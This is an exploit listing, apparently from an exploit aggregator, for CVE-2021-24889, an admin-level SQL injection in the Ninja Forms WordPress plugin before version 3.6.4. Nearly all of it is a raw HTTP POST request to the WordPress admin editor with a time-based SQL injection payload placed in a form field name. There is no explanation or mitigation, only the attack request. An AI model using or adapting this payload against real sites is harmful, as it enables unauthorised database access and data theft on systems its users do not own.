Exploit for Ninja Forms < 3.6.4 - Admin+ SQL Injection CVE-2021-24889

Name: Exploit for Ninja Forms < 3.6.4 - Admin+ SQL Injection CVE-2021-24889
Rating: 5 (366 reviews)

2021-10-26 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:55008A42-EB56-436C-BCE0-10EE616D0495
POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 972
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

_wpnonce=b71ca03531&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D106%26action%3Dedit&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=nf_sub&original_post_status=publish&referredby=http%3A%2F%2F192.168.223.130%2Fwp-admin%2Fedit.php%3Fpost_status%3Dall%26post_type%3Dnf_sub%26form_id%3D2&_wp_original_http_referer=http%3A%2F%2F192.168.223.130%2Fwp-admin%2Fedit.php%3Fpost_status%3Dall%26post_type%3Dnf_sub%26form_id%3D2&post_ID=106&meta-box-order-nonce=0a34e97291&closedpostboxesnonce=88cbb362ee&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=10&jj=20&aa=2021&hh=15&mn=58&ss=47&hidden_mm=10&cur_mm=10&hidden_jj=20&cur_jj=20&hidden_aa=2021&cur_aa=2021&hidden_hh=15&cur_hh=16&hidden_mn=58&cur_mn=47&original_publish=Update&nf_edit_sub=1&save=Update&post_name=106&fields%5B5%5D=0&fields%5B5%5D=on&fields%5B6%5D=0&fields%5B6%5D=on&fields[' or sleep(1)-- -]=xxx